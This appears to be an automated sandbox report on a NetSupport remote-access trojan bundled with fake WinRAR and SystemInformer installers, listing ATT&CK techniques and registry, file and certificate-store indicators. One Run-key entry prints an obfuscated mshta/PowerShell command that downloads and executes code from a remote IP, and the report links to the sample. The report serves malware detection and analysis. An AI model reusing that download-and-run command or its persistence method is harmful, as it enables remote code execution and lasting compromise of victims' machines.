netsupport | hxxps://gofile[.]io/d/YHZWCx

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:close(CreateObject(\"WScript.Shell\").Run(\"powershell $L='(New-Object Net.We';$Y='bClient).Downlo';$V='adString(''http://62.122.184.98/1/2.png'')';$F=I`E`X ($L,$Y,$V -Join '')\|I`E`X\",0))"	b0c71e2b19b3cde4f32ccf2159ab94beca188ffab5d761f2d610989821c772c3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\NovaSoft Desktop Controller = "C:\\Users\\Admin\\AppData\\Local\\Programs\\Advanced Photo Studio\\DisplayPhotoViewer.exe"	DisplayPhotoViewer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\U:	DisplayPhotoViewer.exe
File opened (read-only)	\??\N:	DisplayPhotoViewer.exe
File opened (read-only)	\??\O:	DisplayPhotoViewer.exe
File opened (read-only)	\??\X:	DisplayPhotoViewer.exe
File opened (read-only)	\??\J:	DisplayPhotoViewer.exe
File opened (read-only)	\??\Y:	DisplayPhotoViewer.exe
File opened (read-only)	\??\Z:	DisplayPhotoViewer.exe
File opened (read-only)	\??\H:	DisplayPhotoViewer.exe
File opened (read-only)	\??\I:	DisplayPhotoViewer.exe
File opened (read-only)	\??\K:	DisplayPhotoViewer.exe
File opened (read-only)	\??\R:	DisplayPhotoViewer.exe
File opened (read-only)	\??\S:	DisplayPhotoViewer.exe
File opened (read-only)	\??\W:	DisplayPhotoViewer.exe
File opened (read-only)	\??\Q:	DisplayPhotoViewer.exe
File opened (read-only)	\??\V:	DisplayPhotoViewer.exe
File opened (read-only)	\??\W:	DisplayPhotoViewer.exe
File opened (read-only)	\??\X:	DisplayPhotoViewer.exe
File opened (read-only)	\??\L:	DisplayPhotoViewer.exe
File opened (read-only)	\??\M:	DisplayPhotoViewer.exe
File opened (read-only)	\??\G:	DisplayPhotoViewer.exe
File opened (read-only)	\??\K:	DisplayPhotoViewer.exe
File opened (read-only)	\??\M:	DisplayPhotoViewer.exe
File opened (read-only)	\??\A:	DisplayPhotoViewer.exe
File opened (read-only)	\??\V:	DisplayPhotoViewer.exe
File opened (read-only)	\??\A:	DisplayPhotoViewer.exe
File opened (read-only)	\??\L:	DisplayPhotoViewer.exe
File opened (read-only)	\??\T:	DisplayPhotoViewer.exe
File opened (read-only)	\??\B:	DisplayPhotoViewer.exe
File opened (read-only)	\??\E:	DisplayPhotoViewer.exe
File opened (read-only)	\??\J:	DisplayPhotoViewer.exe
File opened (read-only)	\??\Q:	DisplayPhotoViewer.exe
File opened (read-only)	\??\E:	DisplayPhotoViewer.exe
File opened (read-only)	\??\N:	DisplayPhotoViewer.exe
File opened (read-only)	\??\O:	DisplayPhotoViewer.exe
File opened (read-only)	\??\S:	DisplayPhotoViewer.exe
File opened (read-only)	\??\B:	DisplayPhotoViewer.exe
File opened (read-only)	\??\H:	DisplayPhotoViewer.exe
File opened (read-only)	\??\I:	DisplayPhotoViewer.exe
File opened (read-only)	\??\T:	DisplayPhotoViewer.exe
File opened (read-only)	\??\U:	DisplayPhotoViewer.exe
File opened (read-only)	\??\Y:	DisplayPhotoViewer.exe
File opened (read-only)	\??\Z:	DisplayPhotoViewer.exe
File opened (read-only)	\??\G:	DisplayPhotoViewer.exe
File opened (read-only)	\??\P:	DisplayPhotoViewer.exe
File opened (read-only)	\??\P:	DisplayPhotoViewer.exe
File opened (read-only)	\??\R:	DisplayPhotoViewer.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
5068	tasklist.exe
3372	tasklist.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\WinRAR\Rar.exe	target.exe
File opened for modification	C:\Program Files\WinRAR\RarExt.dll	target.exe
File created	C:\Program Files\SystemInformer\systeminformer-setup.exe	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\plugins\WindowExplorer.dll	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\WinRAR\RarExtInstaller.exe	target.exe
File created	C:\Program Files\WinRAR\RarExtPackage.msix	target.exe
File opened for modification	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png	target.exe
File created	C:\Program Files\SystemInformer\plugins\DotNetTools.sig	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\plugins\OnlineChecks.dll	systeminformer-3.2.25011-release-setup.exe
File opened for modification	C:\Program Files\WinRAR\Descript.ion	target.exe
File created	C:\Program Files\WinRAR\WinRAR.exe	target.exe
File created	C:\Program Files\WinRAR\Resources.pri	target.exe
File opened for modification	C:\Program Files\WinRAR\WinCon.SFX	target.exe
File created	C:\Program Files\SystemInformer\plugins\ExtendedTools.sig	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\plugins\ToolStatus.dll	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\x86\SystemInformer.exe	systeminformer-3.2.25011-release-setup.exe
File opened for modification	C:\Program Files\WinRAR\Rar.exe	target.exe
File created	C:\Program Files\SystemInformer\ksidyn.bin	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\plugins\UserNotes.sig	systeminformer-3.2.25011-release-setup.exe
File opened for modification	C:\Program Files\WinRAR\ReadMe.txt	target.exe
File opened for modification	C:\Program Files\WinRAR\RarFiles.lst	target.exe
File created	C:\Program Files\WinRAR\Zip.SFX	target.exe
File created	C:\Program Files\SystemInformer\dbghelp.dll	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\plugins\Updater.sig	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\Resources\PoolTag.txt	systeminformer-3.2.25011-release-setup.exe
File opened for modification	C:\Program Files\WinRAR\WinRAR.exe	target.exe
File created	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png	target.exe
File created	C:\Program Files\SystemInformer\ksidyn.sig	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\plugins\HardwareDevices.sig	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\x86\plugins\DotNetTools.sig	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\WinRAR\RarExt.dll	target.exe
File created	C:\Program Files\WinRAR\Default32.SFX	target.exe
File created	C:\Program Files\SystemInformer\peview.exe	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\WinRAR\UnRAR.exe	target.exe
File created	C:\Program Files\WinRAR\Zip32.SFX	target.exe
File opened for modification	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png	target.exe
File created	C:\Program Files\SystemInformer\SystemInformer.exe	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\plugins\Updater.dll	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\WinRAR\rarnew.dat	uninstall.exe
File created	C:\Program Files\WinRAR\Order.htm	target.exe
File opened for modification	C:\Program Files\WinRAR\RarExtInstaller.exe	target.exe
File opened for modification	C:\Program Files\WinRAR\Uninstall.lst	target.exe
File created	C:\Program Files\WinRAR\License.txt	target.exe
File opened for modification	C:\Program Files\WinRAR\Rar.txt	target.exe
File opened for modification	C:\Program Files\WinRAR\WhatsNew.txt	target.exe
File opened for modification	C:\Program Files\WinRAR\Order.htm	target.exe
File created	C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png	target.exe
File created	C:\Program Files\SystemInformer\Resources\CapsList.txt	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\WinRAR\Descript.ion	target.exe
File opened for modification	C:\Program Files\WinRAR\Uninstall.exe	target.exe
File created	C:\Program Files\SystemInformer\README.txt	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\symsrv.dll	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\SystemInformer.sig	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\plugins\HardwareDevices.dll	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\x86\plugins\ExtendedTools.dll	systeminformer-3.2.25011-release-setup.exe
File opened for modification	C:\Program Files\WinRAR\RarExt32.dll	target.exe
File created	C:\Program Files\SystemInformer\LICENSE.txt	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\SystemInformer\x86\plugins\ExtendedTools.sig	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\WinRAR\WinCon.SFX	target.exe
File opened for modification	C:\Program Files\WinRAR	target.exe
File created	C:\Program Files\WinRAR\7zxa.dll	target.exe
File created	C:\Program Files\SystemInformer\dbgcore.dll	systeminformer-3.2.25011-release-setup.exe
File created	C:\Program Files\WinRAR\WinCon32.SFX	target.exe
File opened for modification	C:\Program Files\WinRAR\Default.SFX	target.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 4 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Temp\Rar$DRb4000.25227.rartemp\b0c71e2b19b3cde4f32ccf2159ab94beca188ffab5d761f2d610989821c772c3.exe:Zone.Identifier	WinRAR.exe
File opened for modification	C:\Users\Admin\Downloads\Ninite WinRAR Installer.exe:Zone.Identifier	chrome.exe
File opened for modification	C:\Users\Admin\Downloads\systeminformer-3.2.25011-release-setup.exe:Zone.Identifier	chrome.exe
File created	C:\Users\Admin\AppData\Local\Temp\Rar$DRb4680.15047.rartemp\113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1.exe:Zone.Identifier	WinRAR.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ninite.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DisplayPhotoViewer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DisplayPhotoViewer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ninite WinRAR Installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminformer-3.2.25011-release-setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	remcmdstub.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	SystemInformer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	SystemInformer.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe

Modifies data under HKEY_USERS 9 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133814244199736381"	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\WinRAR\Interface\Misc\RemShown = "1"	Ninite.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\WinRAR\Interface\Misc	Ninite.exe
Key created	\REGISTRY\USER\.DEFAULT	Ninite.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	Ninite.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\WinRAR	Ninite.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\WinRAR\Interface	Ninite.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cab\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xxe\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.tbz2	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	WinRAR.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0"	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.001	uninstall.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Program Files\\WinRAR\\WinRAR.exe,0"	uninstall.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	DisplayPhotoViewer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers	uninstall.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings	chrome.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.txz\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	WinRAR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.xz	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.zipx\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	WinRAR.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.tlz\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\InProcServer32	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.arj\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lz\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.xxe	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.z\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\	uninstall.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0 = 5a003100000000002f5acd73100050726f6772616d730000420009000400efbe2f5acd732f5ace732e000000afad0200000019000000000000000000000000000000dadaa100500072006f006700720061006d007300000018000000	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.tbz2\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.uu	uninstall.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	DisplayPhotoViewer.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0\0\MRUListEx = 00000000ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cab	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.lzh\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.tar\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\0\0	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1"	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR	uninstall.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2584844841-1405471295-1760131749-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\MRUListEx = 00000000ffffffff	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext32.dll"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.xz\ = "WinRAR"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Program Files\\WinRAR\\WinRAR.exe,0"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	WinRAR.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}"	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ = "WinRAR.ZIP"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.lha	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bz	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.taz\ = "WinRAR"	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command	uninstall.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Program Files\\WinRAR\\WinRAR.exe\" \"%1\""	uninstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	WinRAR.exe

Modifies system certificate store 2 TTPs 11 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	Ninite WinRAR Installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d8